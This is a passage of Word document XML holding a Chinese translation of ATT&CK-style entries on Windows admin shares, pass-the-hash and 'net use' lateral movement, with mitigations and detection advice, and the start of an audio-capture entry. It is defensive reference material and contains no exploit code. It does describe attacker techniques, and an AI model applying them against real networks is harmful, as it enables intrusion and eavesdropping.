      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有管理员才能访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏网络共享</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（比如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C$</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ADMIN$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），并提供了远程文件复制和其他管理功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA91C46" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会将</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此技术与管理员级别的有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号相结合</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>MB</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程访问联网系统</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程过程调用（</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来与</w:t>
      </w:r>
      <w:r>
        <w:t>系统交互</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，传输文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并通过远程执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE7603" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB/RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上已</w:t>
      </w:r>
      <w:r>
        <w:t>认证会话的技术包括</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务，服务执行和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4324F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4324F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理指令集</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>某配置或补丁级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>tH</w:t>
      </w:r>
      <w:r>
        <w:t>技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:t>访问系统上的管理员共享</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1F6A1" w14:textId="0B809887" w:rsidR="00A0413E" w:rsidRPr="005C5630" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Net</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可与</w:t>
      </w:r>
      <w:r>
        <w:t>有效</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>一起使用，来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>远程系统上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:t>管理员共享。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648F5866" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2719"/>
        <w:gridCol w:w="7017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007C75AD" w14:paraId="0A83E572" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A3F400E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="178954B8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w14:paraId="444FA89B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01060EA6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId228" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EB6DEA">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606CADAD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不要在系统之间复用本地管理员账号密码。确保密码的复杂性和唯一性，以防止被破解或猜中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w14:paraId="2F1B6B71" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="1219"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F0410AF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId229" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EB6DEA">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A00E344" w14:textId="37DFE1E8" w:rsidR="00A0413E" w:rsidRPr="00EB6DEA" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>拒绝远程使用本地管理员</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB6DEA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录系统。不允许域用户账号位于多个系统的本地管理员群组中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49F58952" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA1DC43" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BEF80" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:sectPr w:rsidR="00A0413E" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已对系统登录</w:t>
      </w:r>
      <w:r>
        <w:t>账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:t>了日志功能，且日志集中收集。</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能可以收集</w:t>
      </w:r>
      <w:r>
        <w:t>用于横向移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>账号的成功和失败日志，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且这些</w:t>
      </w:r>
      <w:r>
        <w:t>日志是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件转发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具收集。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程登录事件和关联的</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看</w:t>
      </w:r>
      <w:r>
        <w:t>是否有文件传输及远程进程执行活动。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控命令行界面上用来访问</w:t>
      </w:r>
      <w:r>
        <w:t>远程共享的工具和命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于发现远程可访问系统的发现技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267DDA14" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C87C58" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>采集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524087B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>音频捕捉</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0022511E" w14:paraId="45FA1784" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12664103" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D8B9E6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50609408" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241BCAE7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5943CB25" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>监控，进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D5325F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2664F4DA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00982683" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A121721" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用计算机的外围设备（例如，麦克风和网络摄像头）或应用程序（例如，语音和视频呼叫服务）来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕捉</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>音频记录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>听敏感</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交谈内容</w:t>
      </w:r>
      <w:r>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730E0ED9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件或脚本可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过操作系统或应用提供的可用</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与设备进行交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来捕捉</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>音频。音频文件可能会写入磁盘并在以后被泄漏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C8E11" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
